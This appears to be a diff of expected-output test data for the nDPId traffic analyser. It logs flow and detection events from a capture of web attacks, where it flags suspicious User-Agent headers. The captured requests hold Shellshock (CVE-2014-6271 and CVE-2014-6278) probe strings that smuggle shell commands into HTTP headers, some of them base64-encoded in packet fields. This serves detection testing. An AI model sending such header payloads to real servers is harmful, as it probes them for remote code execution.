-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":1,"flow_last_seen":1576420277446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"ts_msec":1576420277446,"pkt":"AAAAAAAAAAAAAAAACABFAAELQstAAEAG+R9\/AAABfwAAAcVeH5AckXoZTNNhQ4AYAED+\/wAAAQEICp1m\/e6dZv3uR0VUIC9zZXJ2ZXIucGhwIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KDQo="}
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/server.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/server.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":1,"flow_last_seen":1576420277448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"ts_msec":1576420277448,"pkt":"AAAAAAAAAAAAAAAACABFAAEHr2pAAEAGjIR\/AAABfwAAAcVgH5ABL5e76\/gzuYAYAED++wAAAQEICp1m\/fCdZv3wR0VUIC9zdGF0dXMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/status","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/status","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00761{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":1,"flow_last_seen":1576420277449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"ts_msec":1576420277449,"pkt":"AAAAAAAAAAAAAAAACABFAAELeuBAAEAGwQp\/AAABfwAAAcViH5Bf0UINj\/XlzYAYAED+\/wAAAQEICp1m\/fGdZv3xR0VUIC9zeXNpbmZvLnBsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sysinfo.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sysinfo.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00752{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":1,"flow_last_seen":1576420277451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"ts_msec":1576420277451,"pkt":"AAAAAAAAAAAAAAAACABFAAEFPsFAAEAG\/S9\/AAABfwAAAcVkH5CmDwZuBlGlyYAYAED++QAAAQEICp1m\/fOdZv3zR0VUIC90ZXN0IEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":1,"flow_last_seen":1576420277452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"ts_msec":1576420277452,"pkt":"AAAAAAAAAAAAAAAACABFAAEJ+UlAAEAGQqN\/AAABfwAAAcVmH5C1jMGV60p+W4AYAED+\/QAAAQEICp1m\/fSdZv30R0VUIC90ZXN0LWNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":1,"flow_last_seen":1576420277454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"ts_msec":1576420277454,"pkt":"AAAAAAAAAAAAAAAACABFAAEJpZBAAEAGllx\/AAABfwAAAcVoH5CGpZ1eF0nj7YAYAED+\/QAAAQEICp1m\/fadZv32R0VUIC90ZXN0LmNnaSBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":1,"flow_last_seen":1576420277455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"ts_msec":1576420277455,"pkt":"AAAAAAAAAAAAAAAACABFAAENkNNAAEAGqxV\/AAABfwAAAcVqH5AR5agGdIx514AYAED\/AQAAAQEICp1m\/fedZv33R0VUIC90ZXN0X2NnaS5waHAgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
